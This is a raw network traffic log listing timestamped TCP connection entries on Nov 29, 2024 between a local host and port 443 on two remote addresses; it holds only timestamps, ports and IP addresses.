                                                                                                                            Nov 29, 2024 08:31:23.869805098 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.869849920 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.869853020 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.870053053 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.876923084 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.876938105 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.876998901 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.877002954 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.877082109 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.885158062 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.885171890 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.885224104 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.885226965 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.885273933 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.886471987 CET4434983013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.889552116 CET4434983013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.889703035 CET49830443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.889743090 CET49830443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.889758110 CET4434983013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.889766932 CET49830443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.889770985 CET4434983013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.892311096 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.892350912 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.892515898 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.892644882 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.892656088 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.893269062 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.893290043 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.893336058 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.893338919 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.893378019 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.901043892 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.901060104 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.901210070 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.901212931 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.901262045 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.909128904 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.909167051 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.909204960 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.909209013 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.909238100 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.909250021 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.916384935 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.916403055 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.916460991 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.916464090 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.916567087 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.916588068 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:23.964868069 CET4434983113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.964920044 CET4434983113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.964975119 CET4434983113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.964987040 CET49831443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.965025902 CET49831443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.965197086 CET49831443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.965214968 CET4434983113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.965225935 CET49831443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.965230942 CET4434983113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.967927933 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.967962027 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:23.968065977 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.968219042 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:23.968234062 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.063035965 CET4434983213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.066124916 CET4434983213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.070158005 CET49832443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.070322037 CET49832443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.070322037 CET49832443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.070334911 CET4434983213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.070343018 CET4434983213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.072622061 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.072658062 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.072743893 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.072865963 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.072902918 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.072927952 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.072942019 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.072973967 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.072981119 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.073024988 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.080374002 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.080387115 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.080451012 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.080455065 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.080492020 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.087522030 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.087537050 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.087595940 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.087599039 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.090065956 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.095766068 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.095779896 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.095839024 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.095841885 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.097214937 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.102797031 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.102828026 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.102842093 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.102847099 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.102874994 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.102909088 CET44349797104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.102946997 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.113487005 CET49797443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:24.273622990 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.277077913 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.277121067 CET49833443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.277133942 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.277147055 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.277199030 CET49833443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.277328968 CET49833443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.277343988 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.277353048 CET49833443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.277359009 CET4434983313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.283128023 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.283163071 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:24.283241987 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.295857906 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:24.295870066 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.242116928 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.242670059 CET49834443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.242702007 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.243145943 CET49834443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.243150949 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.672349930 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.685105085 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.685129881 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.685574055 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.685580015 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.687093019 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.690119028 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.690196037 CET49834443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.691186905 CET49834443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.691204071 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.691214085 CET49834443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.691219091 CET4434983413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.694335938 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.694375992 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.694447041 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.694555044 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.694564104 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.749150991 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.779333115 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.779357910 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.779880047 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.779885054 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.918175936 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.918622971 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.918634892 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:25.919159889 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:25.919164896 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.080250978 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.083093882 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.083110094 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.083547115 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.083551884 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.116422892 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.116624117 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.116902113 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.117232084 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.117249012 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.117259979 CET49835443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.117264986 CET4434983513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.119734049 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.119755983 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.119827986 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.119959116 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.119970083 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.192898035 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.196118116 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.199443102 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.199516058 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.199531078 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.199539900 CET49836443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.199544907 CET4434983613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.202254057 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.202291012 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.202378988 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.206799984 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.206815958 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.371211052 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.374269962 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.374315977 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.374330044 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.374346018 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.374393940 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.377305031 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.377321959 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.377331018 CET49837443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.377336979 CET4434983713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.385065079 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.385098934 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.385200024 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.385670900 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.385682106 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.603487968 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.603763103 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.603979111 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.604094028 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.604116917 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.604125023 CET49838443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.604130030 CET4434983813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.606729031 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.606779099 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.606843948 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.606975079 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:26.606986046 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.902549982 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:26.902590036 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:26.902659893 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:26.902930021 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:26.902944088 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.480581999 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.481194973 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.481230974 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.481659889 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.481671095 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.900403976 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.900965929 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.900986910 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.901381016 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.901388884 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.924766064 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.927807093 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.927885056 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.927948952 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.927967072 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.927983999 CET49839443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.927989960 CET4434983913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.930692911 CET49845443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.930721045 CET4434984513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.930780888 CET49845443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.930951118 CET49845443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.930970907 CET4434984513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.992445946 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.993236065 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.993264914 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:27.993693113 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:27.993699074 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.103626966 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.104242086 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.104255915 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.104701996 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.104706049 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.162893057 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.164094925 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:28.164103031 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.164153099 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:28.164160013 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.329921961 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.330452919 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.330476046 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.330889940 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.330894947 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.345360994 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.348505020 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.348609924 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.348778963 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.348794937 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.348826885 CET49840443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.348833084 CET4434984013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.351505041 CET49846443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.351541042 CET4434984613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.351634979 CET49846443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.351797104 CET49846443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.351811886 CET4434984613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.434779882 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.434868097 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.434958935 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.434971094 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.434993029 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.435216904 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.435236931 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.435247898 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.435249090 CET49841443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.435256004 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.435262918 CET4434984113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.437639952 CET49847443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.437669039 CET4434984713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.437738895 CET49847443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.437872887 CET49847443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.437885046 CET4434984713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.540081024 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.544013977 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.544121981 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.544233084 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.544249058 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.544261932 CET49842443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.544266939 CET4434984213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.546814919 CET49848443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.546845913 CET4434984813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.546919107 CET49848443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.547036886 CET49848443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.547046900 CET4434984813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.764378071 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.767740011 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.767853022 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.767929077 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.767952919 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.767961979 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.768001080 CET49843443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.768004894 CET4434984313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.771034002 CET49849443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.771064997 CET4434984913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:28.771892071 CET49849443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.772000074 CET49849443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:31:28.772007942 CET4434984913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:29.156915903 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:29.156979084 CET44349844104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:29.157066107 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:29.157493114 CET49844443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:29.177994967 CET49850443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:29.178042889 CET44349850104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:31:29.178113937 CET49850443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:29.178356886 CET49850443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:31:29.178366899 CET44349850104.21.75.170192.168.2.5
